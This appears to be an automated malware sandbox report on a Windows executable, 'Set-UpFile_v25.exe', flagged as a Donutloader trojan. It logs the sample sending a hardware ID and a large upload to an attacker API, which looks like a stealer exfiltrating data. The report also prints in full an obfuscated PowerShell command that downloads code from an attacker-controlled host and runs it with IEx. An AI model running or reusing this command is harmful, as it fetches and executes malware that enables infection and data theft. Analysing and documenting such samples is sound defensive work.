2025-01-07 13:37:24 UTC | 279 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=DQ9HCLZXYVNW0P7R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 1241
Host: beattalkerz.cyou
2025-01-07 13:37:24 UTC | 1241 | OUT | Data Raw: 2d 2d 44 51 39 48 43 4c 5a 58 59 56 4e 57 30 50 37 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 37 37 31 46 30 30 33 35 30 46 44 30 31 37 42 33 33 36 34 32 44 41 36 30 38 39 35 36 46 46 31 0d 0a 2d 2d 44 51 39 48 43 4c 5a 58 59 56 4e 57 30 50 37 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 44 51 39 48 43 4c 5a 58 59 56 4e 57 30 50 37 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 0d 0a 2d 2d 44 51 39
Data Ascii: --DQ9HCLZXYVNW0P7RContent-Disposition: form-data; name="hwid"C771F00350FD017B33642DA608956FF1--DQ9HCLZXYVNW0P7RContent-Disposition: form-data; name="pid"1--DQ9HCLZXYVNW0P7RContent-Disposition: form-data; name="lid"hRjzG3--ZINA--DQ9
2025-01-07 13:37:24 UTC | 1130 | IN | HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 13:37:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=s397q57r5r7diuce45fg0rhj3i; expires=Sat, 03 May 2025 07:24:03 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DGcOTgdeZ6LZN%2FkaJqlo0Bl109LHzZajcUz8u7O4GWA%2F4seJj1ixX%2BtfJglw5iVf8%2F2vTjvizf9hDnkbSRohBfFABSy20%2F8lPbX%2FPSAzcobabkMAsMf9AtCf%2FsyOHbQ59YcA"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fe4579ffe0b8c30-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2012&min_rtt=1983&rtt_var=802&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2156&delivery_rate=1316501&cwnd=218&unsent_bytes=0&cid=c6944622ed0f87d1&ts=451&x=0"
2025-01-07 13:37:24 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-07 13:37:24 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49756 | 104.21.25.52 | 443 | 7272 | C:\Users\user\Desktop\Set-UpFile_v25.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 13:37:26 UTC | 275 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=DPCH7IOTRU
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 586472
Host: beattalkerz.cyou
2025-01-07 13:37:26 UTC | 15331 | OUT | Data Raw: 2d 2d 44 50 43 48 37 49 4f 54 52 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 37 37 31 46 30 30 33 35 30 46 44 30 31 37 42 33 33 36 34 32 44 41 36 30 38 39 35 36 46 46 31 0d 0a 2d 2d 44 50 43 48 37 49 4f 54 52 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 44 50 43 48 37 49 4f 54 52 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 0d 0a 2d 2d 44 50 43 48 37 49 4f 54 52 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44
Data Ascii: --DPCH7IOTRUContent-Disposition: form-data; name="hwid"C771F00350FD017B33642DA608956FF1--DPCH7IOTRUContent-Disposition: form-data; name="pid"1--DPCH7IOTRUContent-Disposition: form-data; name="lid"hRjzG3--ZINA--DPCH7IOTRUContent-D
2025-01-07 13:37:26 UTC | 15331 | OUT | Data Raw: 31 76 28 bf f9 1f 5f b5 28 c6 85 0d e9 17 93 8e 5f 5b 35 eb dd d5 39 6c 8b 8c 8a aa e4 6d 93 59 6e 4e 13 dd 7a 45 4d 2a 71 d0 de 27 74 31 4b 15 1b 51 11 7f 9c 09 bc 0f 42 65 97 6a 66 4a af f1 e3 06 06 b7 f2 0a 89 8f 61 2f 75 c2 40 89 52 25 82 fe 3c bd d1 50 1b 33 74 e4 ec a4 76 f8 5f 1f f7 89 da 60 6e b7 f4 13 9c f9 9f 17 1e 9c 5a 33 9f 91 e9 aa 7a 90 ad 8e 66 4f ab 9b b2 df bf 4f 85 e8 3b 4c 85 6c e8 ab e6 1d 6c aa 9e a8 06 25 49 7b 42 0a ef ce b4 74 71 9e c9 af c0 0d f2 f7 40 5b 50 75 74 6f c2 69 ce 8e d9 42 93 30 f7 43 29 7b 71 d3 8c 21 17 37 1f e5 ae 55 de 10 de 86 f3 f9 eb eb 35 07 a9 e7 d9 e9 f3 3e 31 c2 00 e8 45 50 ad 51 29 34 cb 22 31 fa 4f f1 ee d5 93 7e cb 5f c2 73 40 8f b0 ef 6d dd 27 a0 a7 1a b0 83 77 af 27 1f fc e4 ba 9a 52 16 d8 e9 a6 c2 77
Data Ascii: 1v(_(_[59lmYnNzEM*q't1KQBejfJa/u@R%<P3tv_`nZ3zfOO;Lll%I{Btq@[PutoiB0C){q!7U5>1EPQ)4"1O~_s@m'w'Rw
2025-01-07 13:37:26 UTC | 15331 | OUT | Data Raw: 93 07 aa 98 c6 ad 58 22 61 23 15 84 db 40 fe ff f6 1e 92 f0 63 18 bb a0 5e d3 92 dc 1b af 28 36 0a ec 49 4d 2f 1b a1 e0 f9 d1 38 0e 50 fc 54 0c f6 e7 cd 94 76 df 78 72 98 a0 12 90 de c5 94 9b cd d6 b1 74 ae b3 36 42 89 7a 59 3c 8f e6 60 10 ec a6 ac 0d e5 bd 50 88 a6 0f 6d 81 45 8f 43 66 17 1b 24 05 75 dd ce bf 57 ba e0 b7 2f 52 48 ed 75 2a 8d f0 9d 96 99 01 27 f0 f9 42 d0 c9 8b aa bf ef b0 95 04 91 4c c2 20 ba c9 ee 72 1e e7 8a 18 36 b3 15 e6 17 7b bd 9e 04 f0 4d 5a df d9 ec fe 2a a0 5c 53 89 d5 5c f3 ea 7a 1a 6a e7 b2 31 f0 18 56 e6 74 9b 41 b7 4e 23 e6 f7 f2 38 8d b6 42 d4 7d 98 93 92 e7 49 1d 8c 48 2f de 18 c2 f3 88 6f 3c a2 ae 10 ef 43 87 4a 71 f6 79 06 70 fc de fc 43 a0 fc 5f 64 60 6c ce 17 47 ed 7d d1 f5 c3 db a5 37 a5 a3 c2 7d a7 ae 01 33 11 99 e5
Data Ascii: X"a#@c^(6IM/8PTvxrt6BzY<`PmECf$uW/RHu*'BL r6{MZ*\S\zj1VtAN#8B}IH/o<CJqypC_d`lG}7}3
2025-01-07 13:37:26 UTC | 15331 | OUT | Data Raw: af bb 4b 27 0e 18 46 85 ef 05 c7 0d 10 67 8c 8b f8 a2 83 ee 61 18 ab 23 cd f7 37 4c 12 8d c1 4a ca 45 d6 1f 3d 83 fe 63 a9 43 33 cf c3 57 a0 1c 64 f0 45 07 62 57 e2 76 f5 91 bb af 9a 6f 59 1b 3f 62 d8 74 04 79 00 41 c8 b9 e7 9c 5d 81 e2 ef ce aa a5 c1 5a 95 02 ce e9 01 21 b2 2f e7 28 7b 0c 05 c2 b3 5b 6a 25 32 2e ff 17 bf 3f ee dc f0 91 be f0 e5 93 f7 05 8b ce 81 2d 36 f3 82 e7 6b ee 0e 04 50 02 bc b6 2a f7 60 ab bb 2f d8 9f 8f aa 16 d5 2e 15 00 87 12 88 6c c8 75 5e da c4 6d a1 54 7e 9b 48 a9 2c c8 63 11 fd ea ee 44 c5 0b a7 54 f8 de de 04 9e f3 65 26 44 53 40 da 32 8c ec e7 86 37 53 e8 1b 91 77 38 27 21 de 04 78 e4 52 06 40 7e 27 88 df cd 7c b9 3c 7a 9e 20 fa 9c 61 a0 a7 2e 79 1f 52 5b 47 00 cd 00 0f 28 c4 c5 b2 da 06 58 4d 5e f0 29 88 90 fb b4 a8 84 27
Data Ascii: K'Fga#7LJE=cC3WdEbWvoY?btyA]Z!/({[j%2.?-6kP*`/.lu^mT~H,cDTe&DS@27Sw8'!xR@~'|<z a.yR[G(XM^)'
2025-01-07 13:37:26 UTC | 15331 | OUT | Data Raw: ad 1e 4c 2f 90 5a 5f 71 e5 49 7b 6b 5d 87 f9 09 a7 ae fa c3 68 28 ce 49 e4 b5 37 4f 28 bc d6 b4 c6 a3 d4 94 a2 22 d9 03 c2 f5 7c b9 22 38 45 3f a5 83 dc dc e8 10 47 e8 95 ec 3a 69 e5 f3 d2 1a 0d 2b 96 d4 9c 6b 2a f2 db 4d 62 0c 1a ea aa ba 95 50 df 19 79 4f cc 62 af 88 cb 04 1f aa b5 92 04 27 6e 34 5e da f1 16 98 73 dc 1b cd 76 84 be f6 c3 e7 fb eb 67 36 47 7e f4 e9 49 b1 e5 35 1a 69 33 2d fb b5 47 23 62 63 d2 18 3c a1 50 bc bc eb 97 fb 95 ab 65 2a 80 e6 aa 32 38 bd 04 99 55 87 db e5 a8 a8 e2 e7 43 db 57 d6 fc 46 db 36 2c 2b 5a d6 5e 6f ba c5 45 d6 ad ab 1d e4 49 54 51 19 68 dc 88 f7 38 24 92 66 c8 45 6d 03 f6 a6 79 9a a1 3f 47 47 b9 6d 40 0b 82 ff be a7 e2 30 c9 b4 82 13 f2 23 5a b4 f9 ee e0 aa 77 3a c9 21 af 96 2b c3 69 9d e2 49 3c 0c 88 17 88 2d 0e a2
Data Ascii: L/Z_qI{k]h(I7O("|"8E?G:i+k*MbPyOb'n4^svg6G~I5i3-G#bc<Pe*28UCWF6,+Z^oEITQh8$fEmy?GGm@0#Zw:!+iI<-
2025-01-07 13:37:26 UTC | 15331 | OUT | Data Raw: f6 b7 cc b3 be ed b6 fb 84 2e 00 4b c9 16 1d 05 6e 6c 4b e9 07 a1 47 d6 4d ba e4 5f a5 64 ef dc 14 16 9f 0a 2c de c2 6f ed 4f 1e 36 d9 9f 71 9d 58 5a af 2f 31 0e cd 0d dd 63 fa 2d 38 4b 05 69 39 b6 d4 e8 b9 e1 04 cf 56 a1 08 ee f2 d9 86 e1 c8 18 72 3d 6d 34 93 54 6d a7 ec 3e de ab 54 90 96 2f 34 4d 45 1b 4f f0 7c 2f f4 e2 ef 8d 74 57 d1 c8 da 23 a7 82 53 00 48 49 94 91 b8 3a f7 b2 00 df e7 93 e1 64 3e c1 77 44 a3 c9 c3 6b eb 80 40 52 fc fe 5c 0d 2e 8f 66 02 a4 eb 06 8a 0e 0f 2b 82 8c f9 0b eb f5 cc c3 36 ae 51 06 78 d6 e4 87 fc 8f 95 9d d0 cd e4 60 3e f4 30 3b f4 57 5c 2c 99 4e c2 2f e4 20 a1 06 ae 3e 35 3c 7e 93 d3 3d 31 c5 54 3e a8 d4 66 0d 47 83 69 99 ea 6f cc e2 96 80 89 16 5b c4 e0 5e c4 83 aa 3c 77 0a 65 6e f8 74 e5 74 f5 90 f2 8b 13 7b ca 1c 7b a6
Data Ascii: .KnlKGM_d,oO6qXZ/1c-8Ki9Vr=m4Tm>T/4MEO|/tW#SHI:d>wDk@R\.f+6Qx`>0;W\,N/ >5<~=1T>fGio[^<wentt{{
2025-01-07 13:37:26 UTC | 15331 | OUT | Data Raw: e8 d2 96 59 67 2f 7f b4 79 92 65 97 a7 58 b2 dc ac f3 b8 ef 6e 95 5e c9 6c 67 df 3f b6 77 4b be d6 fe fb e2 4e e9 81 92 c5 89 13 7b 49 dc 9e 96 7f aa b8 7f 86 f6 91 36 16 53 5a f0 0b 2f e4 40 77 0a df 00 0d 86 05 f9 f4 ab 36 af 09 81 14 26 58 f8 32 f6 fb 30 c8 c2 c0 eb 47 33 d4 09 26 80 94 05 61 50 28 11 b0 26 02 65 bf ea 57 fa 75 06 8d 94 52 f0 d7 96 e1 7b 6b 1c e0 bf 78 49 e4 c8 41 52 e6 e6 a5 be b4 0f aa df 77 0b 1a 60 43 60 f8 71 a3 cd 52 57 57 e5 9f f9 2b 42 2f 83 d9 3a d9 86 ef 23 59 1e 1e 1b 2e cf 1e 42 94 74 77 c6 61 30 63 e6 b1 03 08 f2 e3 9b 45 b7 9b 23 22 c3 eb 39 42 cd b7 0f 8b aa 11 91 25 b6 ef f8 e2 df 17 dd 88 ad ff c2 2b 52 50 e7 2e 58 0a ba 53 02 fc 71 f0 61 1c f1 ed 1e 22 1f ea cf 64 5a 16 bf f9 68 95 37 0f e3 e4 9b b1 34 3e 70 f9 07 3b
Data Ascii: Yg/yeXn^lg?wKN{I6SZ/@w6&X20G3&aP(&eWuR{kxIARw`C`qRWW+B/:#Y.Btwa0cE#"9B%+RP.XSqa"dZh74>p;
2025-01-07 13:37:26 UTC | 15331 | OUT | Data Raw: d6 d2 10 e9 39 2d 19 03 a7 68 ef c1 79 5b b2 8d d0 f4 e2 79 f7 f5 cb 01 2d b8 89 a1 69 56 b3 6b c0 fc ba 16 24 55 31 8f b6 fe dd a2 3f 95 b2 0f 84 49 b7 86 96 3c eb 72 76 79 59 a1 ff 62 b1 52 2f df 7a ee 45 c5 6a 93 50 a9 4f f1 56 99 1a b5 65 f0 51 40 d1 52 9b 52 54 4a 68 4b 38 67 a6 d8 b5 f3 d7 9c 6c ed 93 9a 2e 64 86 77 f9 ff 5e 6a 29 c9 b9 f5 99 d4 70 d0 01 4a 0c 3c e6 be 03 3c d4 74 e7 03 57 07 6a 9b d3 97 5a d6 f3 e3 c6 ce 19 4d b6 1c 72 0d d0 e8 ac 38 a4 12 a4 37 4f ea ae 6e 9b 78 58 65 06 42 41 c0 e0 2e bf cf ac 41 e8 3c 57 31 c2 17 be 06 6e c0 ff 96 6d 19 71 f2 b5 a7 95 36 f4 e0 5f 65 87 bc da cb 6c d8 95 8b 33 2c 93 25 0f eb c7 b4 a1 75 8f c5 7f e6 d5 b0 e0 b7 ac 9c b9 a2 86 00 de 8a 07 40 bc 2d 0e 9d eb 83 0b 15 84 78 0e 6f 65 9d f3 43 aa 19 ed
Data Ascii: 9-hy[y-iVk$U1?I<rvyYbR/zEjPOVeQ@RRTJhK8gl.dw^j)pJ<<tWjZMr87OnxXeBA.A<W1nmq6_el3,%u@-xoeC
2025-01-07 13:37:26 UTC | 15331 | OUT | Data Raw: 81 4e 5d 2b 4c c4 c2 fc 87 e2 c0 ac b6 c6 b7 84 3f 2c d8 f2 90 15 c9 02 d7 4f 3e 2c b5 74 84 5f 2b 57 25 0f 65 44 29 b5 8a 79 b4 6d 23 a2 d1 9c e6 62 4d 25 67 bb 39 ef e3 07 6b c8 72 cc d7 2a 56 c6 4f 1a d6 f7 1f 48 6a 7c b5 3b 6f 27 7a 3a cc 19 17 de ae f9 07 da 25 9a 7d dc f9 71 86 20 75 7b d2 23 f7 3f 98 2b a9 a9 4a 32 7f 56 2f 48 26 89 d1 1b d6 9b 83 f2 e2 d0 e6 18 db 5b 46 7b fa cd db 6b 36 c2 01 0a b3 6b dd 6d 86 0a d3 bb 68 86 f2 ba 63 44 53 6c 44 31 5e 4c f8 85 3c 2c c8 6d 81 da 35 f3 ac 20 a5 ae b0 e4 15 e9 27 4e 3a ef d4 d9 db 08 b5 7f 9c ef 2c ec 5a bd d5 4f 14 c2 fa c7 a5 62 3d 00 25 85 e9 10 51 17 a7 15 8f a5 c8 a2 5b 5b 9d 37 b8 20 a0 f4 cd 7c f5 1e f4 bb 47 90 59 6d c6 6e de 89 bb ce 26 fb bb b3 62 8d d5 25 b7 e9 61 a7 2e 17 f3 50 cb 03 06
Data Ascii: N]+L?,O>,t_+W%eD)ym#bM%g9kr*VOHj|;o'z:%}q u{#?+J2V/H&[F{k6kmhcDSlD1^L<,m5 'N:,ZOb=%Q[[7 |GYmn&b%a.P
2025-01-07 13:37:26 UTC | 15331 | OUT | Data Raw: dc 16 db 21 f3 5b 5b 3e 1c cd 90 4a b8 1f c9 51 4c af c0 5c 85 83 a2 cc 34 17 a3 4d 88 fa 73 9a 3d 6b 5e 68 61 a9 e4 48 45 41 94 a2 1e 5d 67 7c 31 65 da 93 99 bc f8 70 0b f7 ea 06 f8 9b 82 f5 28 15 12 65 d7 f0 de 10 e3 35 32 ff 3c 7e c9 ae c4 c3 d1 81 ba 7d 25 b1 ed 39 04 4f be 42 4d 69 23 14 a9 3f f9 c6 8b d1 0e 1d 83 f7 ea cc 76 5d e3 25 99 72 0d e5 df 9c d6 bd 52 28 9d b3 16 fb cd 95 8d 09 f1 5b b0 8b 76 1e 6c 5a e3 8a 6d a2 24 ad d4 ec a5 d7 4a 47 70 78 41 5b d2 9c 93 78 a6 6c 77 a5 b4 8a c0 96 6a c5 55 a8 e7 94 a8 c3 71 8f 95 63 07 e1 9d 2a a4 36 3d 72 bc 86 71 36 ba f5 e5 af 38 1f a7 43 b0 00 ee 4d 2e 0a e0 33 6d 8a a3 b7 4e 47 f0 75 18 c5 c1 53 4f b2 0c bb d0 c3 03 ba 27 a9 4d 50 d3 43 51 a7 6f 7e f1 8d 8e 44 f9 82 4e f2 8e 35 f5 a5 60 3c 31 b8 96
                                                                                                                                                              Data Ascii: ![[>JQL\4Ms=k^haHEA]g|1ep(e52<~}%9OBMi#?v]%rR([vlZm$JGpxA[xlwjUqc*6=rq68CM.3mNGuSO'MPCQo~DN5`<1
2025-01-07 13:37:27 UTC | 1135 | IN | HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 13:37:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=hat95bffjk3nan1v96ij9nlu6p; expires=Sat, 03 May 2025 07:24:06 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oh%2FEXAwS%2BEAQE27K4o1ka7n0I1NkWoEkwseV5yxO0P%2FeeawqPUl2PQZoLfByzWc%2Bl1Maovy5hGnq8Ej8jU6ZPzckFcTYvuJwy6RBYEAFwCe6dLn7mLkWRRHFnE%2F4yGrV%2F0oG"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fe457aa2de90f5b-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1526&min_rtt=1511&rtt_var=597&sent=205&recv=604&lost=0&retrans=0&sent_bytes=2839&recv_bytes=589055&delivery_rate=1788120&cwnd=221&unsent_bytes=0&cid=d9095516ae01d5da&ts=1617&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49757 | 104.21.25.52 | 443 | 7272 | C:\Users\user\Desktop\Set-UpFile_v25.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-07 13:37:28 UTC | 265 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 113
Host: beattalkerz.cyou
2025-01-07 13:37:28 UTC | 113 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37 26 68 77 69 64 3d 43 37 37 31 46 30 30 33 35 30 46 44 30 31 37 42 33 33 36 34 32 44 41 36 30 38 39 35 36 46 46 31
Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--ZINA&j=637b55279021aab33278188cfa638397&hwid=C771F00350FD017B33642DA608956FF1
2025-01-07 13:37:28 UTC | 1128 | IN | HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 13:37:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=121s4kduq5j3p347krdgbl71fg; expires=Sat, 03 May 2025 07:24:07 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0eY%2Bbbzep%2BXcWgK9%2FX44fcKVSWfQ4DQPhAUu9p6sOxC3ktkiCn6MyiCtLqMO9glVmcl7jE09vMGi9wx5iDnkpiTSGM4Bqq30GGhRdPNh2%2FW2MozggA9UjVyVpf35peU%2F8ES%2B"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fe457b77ae15e61-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1701&min_rtt=1687&rtt_var=661&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1014&delivery_rate=1622222&cwnd=209&unsent_bytes=0&cid=889cbd62e144d111&ts=501&x=0"
2025-01-07 13:37:28 UTC | 218 | IN | Data Raw: 64 34 0d 0a 69 2b 4f 32 66 65 56 56 58 78 77 4d 2f 7a 56 62 51 57 59 47 37 6c 58 54 49 78 78 58 31 43 51 63 42 67 2f 48 50 4e 6d 78 47 58 62 51 6d 4a 51 49 78 32 39 39 64 48 69 4c 52 53 68 37 4f 69 6d 79 65 72 42 47 65 79 4c 36 56 33 52 70 66 35 73 54 34 59 51 75 51 72 6e 56 68 45 6e 52 59 77 4d 7a 66 4a 63 62 4c 7a 6b 53 4a 4d 4a 33 74 56 63 2b 62 65 59 49 50 6d 4d 74 2f 51 32 6b 6e 57 4a 55 2f 73 47 4d 58 34 30 68 4b 32 78 2f 78 57 6c 30 48 55 6c 74 67 6a 79 6a 56 57 6b 36 76 56 64 70 62 79 47 30 56 4c 62 42 52 56 6e 69 6a 63 49 69 68 6a 6b 76 51 33 2b 58 56 48 55 31 48 6e 4c 4d 65 66 46 46 61 48 58 75 46 44 41 6b 61 75 55 47 36 63 78 45 0d 0a
Data Ascii: d4i+O2feVVXxwM/zVbQWYG7lXTIxxX1CQcBg/HPNmxGXbQmJQIx299dHiLRSh7OimyerBGeyL6V3Rpf5sT4YQuQrnVhEnRYwMzfJcbLzkSJMJ3tVc+beYIPmMt/Q2knWJU/sGMX40hK2x/xWl0HUltgjyjVWk6vVdpbyG0VLbBRVnijcIihjkvQ3+XVHU1HnLMefFFaHXuFDAkauUG6cxE
2025-01-07 13:37:28 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49758 | 185.161.251.21 | 443 | 7272 | C:\Users\user\Desktop\Set-UpFile_v25.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-07 13:37:29 UTC | 201 | OUT | GET /8574262446/ph.txt HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: cegu.shop
2025-01-07 13:37:29 UTC | 249 | IN | HTTP/1.1 200 OK
Server: nginx/1.26.2
Date: Tue, 07 Jan 2025 13:37:29 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 329
Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT
Connection: close
ETag: "676c9e2a-149"
Accept-Ranges: bytes
2025-01-07 13:37:29 UTC | 329 | IN | Data Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e
Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.


Target ID: 0
Start time: 08:36:59
Start date: 07/01/2025
Path: C:\Users\user\Desktop\Set-UpFile_v25.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Set-UpFile_v25.exe"
Imagebase: 0x400000
File size: 75'060'322 bytes
MD5 hash: 2F33775C502E7B2D60B9BFE944B46863
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Yara matches:
• Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation: low
Has exited: true

Target ID: 4
Start time: 08:37:29
Start date: 07/01/2025
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
Imagebase: 0xfa0000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 08:37:29
Start date: 07/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true


Execution Graph

Execution Coverage: 1.6%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 31.6%
Total number of Nodes: 117
Total number of Limit Nodes: 11
APIs
• NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 029D2DCE
